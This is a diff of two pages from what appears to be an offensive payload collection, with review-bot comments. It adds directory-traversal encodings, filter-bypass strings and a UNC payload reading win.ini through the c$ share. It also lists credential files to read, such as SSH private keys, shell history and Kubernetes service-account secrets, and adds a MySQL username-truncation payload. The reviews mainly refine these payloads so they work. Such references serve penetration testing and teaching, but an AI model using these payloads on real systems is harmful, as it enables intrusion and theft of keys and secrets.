Directory Traversal/README.md
Lines changed: 29 additions & 14 deletions
@@ -6,7 +6,14 @@
6
6
7
7
*[Tools](#tools)
8
8
*[Basic exploitation](#basic-exploitation)
9
+
*[16 bits Unicode encoding](#)
10
+
*[UTF-8 Unicode encoding](#)
11
+
*[Bypass "../" replaced by ""](#)
12
+
*[Double URL encoding](#)
13
+
*[UNC Bypass](#unc-bypass)
9
14
*[Path Traversal](#path-traversal)
15
+
*[Interesting Linux files](#)
16
+
*[Interesting Windows files](#)
10
17
11
18
## Tools
12
19
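Review bot: the new table-of-contents entries in this hunk all point at `#`, so clicking them jumps to the top of the file rather than to the section; only `*[UNC Bypass](#unc-bypass)` received a real anchor. Give each entry the slug GitHub generates from its heading, e.g. `*[16 bits Unicode encoding](#16-bits-unicode-encoding)`, `*[Double URL encoding](#double-url-encoding)` and `*[Interesting Linux files](#interesting-linux-files)`, and verify the slug for the `Bypass "../" replaced by ""` heading against the rendered page, since the quotes and slashes are dropped from it.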
@@ -31,41 +38,50 @@ We can use the `..` characters to access the parent directory, the following str
31
38
%uff0e%uff0e%u2216
32
39
```
33
40
34
-
16 bit Unicode encoding
41
+
### 16 bits Unicode encoding
35
42
36
43
```powershell
37
44
. = %u002e
38
45
/ = %u2215
39
46
\ = %u2216
40
47
```
41
48
42
-
UTF-8 Unicode encoding
49
+
### UTF-8 Unicode encoding
43
50
44
51
```powershell
45
52
. = %c0%2e, %e0%40%ae, %c0ae
46
53
/ = %c0%af, %e0%80%af, %c0%2f
47
54
\ = %c0%5c, %c0%80%5c
48
55
```
49
56
57
+
### Bypass "../" replaced by ""
50
58
Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them.
51
59
52
60
```powershell
53
61
..././
54
62
...\.\
55
63
```
56
64
57
-
Double URL encoding
65
+
### Double URL encoding
58
66
59
67
```powershell
60
68
. = %252e
61
69
/ = %252f
62
70
\ = %255c
63
71
```
64
72
73
+
### UNC Bypass
74
+
75
+
An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
76
+
77
+
```powershell
78
+
\\localhost\c$\windows\win.ini
79
+
```
80
+
65
81
66
82
## Path Traversal
67
83
68
-
Linux - Interesting files to check out :
84
+
### Interesting Linux files
69
85
70
86
```powershell
71
87
/etc/issue
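Review bot: the new UNC Bypass section states no precondition for its example. `\\localhost\c$\windows\win.ini` only works when the application runs on Windows and passes the user-controlled path to a file API that accepts UNC paths, and it reads through the `c$` administrative share, so it also requires the process to have rights to that share; say so next to the snippet, otherwise the entry looks like a generic traversal payload. Two smaller points in the same hunk: "Sometimes you encounter a WAF which remove the "../" characters" should read "which removes", and it is worth adding that `..././` and `...\.\` only defeat a single-pass replacement, a filter that strips repeatedly or normalises the path before checking it is not bypassed. The heading "16 bits Unicode encoding" should be "16-bit Unicode encoding".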
@@ -85,9 +101,16 @@ Linux - Interesting files to check out :
85
101
/proc/net/route
86
102
/proc/net/tcp
87
103
/proc/net/udp
104
+
/proc/self/cwd/index.php
105
+
/proc/self/cwd/main.py
106
+
/home/$USER/.bash_history
107
+
/home/$USER/.ssh/id_rsa
108
+
/var/run/secrets/kubernetes.io/serviceaccount
88
109
```
89
110
90
-
Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
111
+
### Interesting Windows files
112
+
113
+
Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
91
114
92
115
```powershell
93
116
c:/boot.ini
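Review bot: `/home/$USER/.bash_history` and `/home/$USER/.ssh/id_rsa` contain a shell variable that the target never expands, so the path is sent literally; mark the user name as a placeholder the reader must fill in (e.g. `/home/<user>/.ssh/id_rsa`) and mention that `/etc/passwd`, already listed in this section, gives the candidate names. `/var/run/secrets/kubernetes.io/serviceaccount` is a directory, not a file; list the files inside it that are actually meant to be read (`token`, `ca.crt`, `namespace`). `/proc/self/cwd/index.php` and `/proc/self/cwd/main.py` assume the serving process's working directory is the web root, which is worth a short note. Finally, the new `### Interesting Windows files` heading is immediately followed by "Interesting files to check out", which now repeats the heading; keep only the source attribution on that line.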
@@ -127,15 +150,7 @@ The following log files are controllable and can be included with an evil payloa
SQL Injection/MySQL Injection.md
Lines changed: 6 additions & 0 deletions
@@ -263,6 +263,12 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo
263
263
264
264
In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.
265
265
266
+
```sql
267
+
`username`varchar(20) not null
268
+
```
269
+
270
+
Payload: `username = "admin a"`
271
+
266
272
## MYSQL UDF command execution
267
273
268
274
First you need to check if the UDF are installed on the server.
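Review bot: the added payload does not demonstrate the truncation the paragraph above describes. With `varchar(20)` the value `admin a` is seven characters long, nothing is cut off, and the stored name is simply `admin a`, which does not compare equal to `admin`. For the example to match the text the input has to exceed the column limit and, after truncation, end in the padding that the "`admin `" and "`admin`" comparison relies on: `admin` followed by spaces up to 20 characters and then one extra character, so the stored value is `admin` plus trailing spaces. The column definition `` `username`varchar(20) not null `` is also missing the space between name and type and is not a complete statement; show it inside a `CREATE TABLE`. Finally, note in the text that this only happens when the server accepts the over-long value silently; in strict SQL mode the insert is rejected with an error instead of being truncated, which is the mitigation.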